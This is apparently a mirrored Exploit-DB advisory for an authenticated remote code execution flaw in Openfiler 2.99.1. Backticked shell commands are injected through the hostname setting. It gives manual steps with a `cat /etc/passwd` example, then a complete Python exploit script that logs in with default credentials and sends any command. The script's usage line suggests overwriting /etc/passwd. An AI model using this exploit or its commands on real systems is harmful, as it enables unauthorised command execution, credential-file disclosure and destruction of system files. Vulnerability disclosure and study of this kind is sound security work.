OpenFiler 2.99.1 – Arbitrary Code Execution

• Exploit Database
• 20 阅读

• 作者： Dolev Farhi
  日期： 2014-05-08
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/33247/

• # Exploit Title: Arbitrary Code Execution in Openfiler
  
  # Exploit author: Dolev Farhi @f1nhack
  
  # Date 07/05/2014
  
  # Vendor homepage: http://www.openfiler.com
  
  # Affected Software version: 2.99.1
  
  # Alerted vendor: 7.5.14
  
  
  Software Description
  =====================
  Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based 
  Storage Area Networking functionality in a single cohesive framework.
  
  
  
  Vulnerability Description
  =========================
  Arbitrary code execution
  
  
  Steps to reproduce / PoC:
  =========================
  1.1. Login to Openfiler dashboard.
  
  1.2. Under system tab -> Hostname
  
  1.3. Enter any shell command you desire using the backticks ` ` 
  
  	e.g. `cat /etc/passwd`
  	
  1.4. the code reflects in the hostname value space
  
  
  
  <-> PoC Video: https://www.youtube.com/watch?v=NzjB9U_0yLE&feature=youtu.be
  
  #!/usr/bin/env python
  # Exploit Title: Openfiler Remote Code Execution 
  # Date 21/12/2014
  # Affected Software version: 2.99.1
  # Alerted vendor: 7.5.14
  
  # Quick and dirty exploit
  # usage: python openfiler_RCE.py <Command>
  # Author: Dolev Farhi @dolevff
  
  import sys
  import urllib
  import urllib2
  import cookielib
  
  server = 'ip.add.re.ss'
  username = 'openfiler'
  password = 'password'
  timeout = 6
  command = '`' + ' '.join(sys.argv[1:]) + '`'
  
  if len(sys.argv[1:]) == 0:
  print 'Missing argument (command)'
  print 'example: python openfilerRCE.py echo > /etc/passwd'
  sys.exit(0)
  
  try:
  cj = cookielib.CookieJar()
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  login_data = urllib.urlencode({'username' : username, 'password' : password})
  opener.open('https://' + server + ':446/account/login.html', login_data, timeout=timeout)
  payload = urllib.urlencode({'hostname' : command,'netconf' : 'Update'})
  url = 'https://%s:446/admin/system.html' % (server)
  resp = opener.open(url)
  if 'logout.html' in resp.read():
  opener.open('https://' + server + ':446/admin/system.html', payload)
  print ('Executed %s :-)' %(command))
  sys.exit(0)
  except urllib2.URLError, e:
  print 'Error: %s' %(e.reason)
  sys.exit(1)
  except Exception, e:
  print 'Error: possibily invalid credentials, try again.'
  sys.exit(1)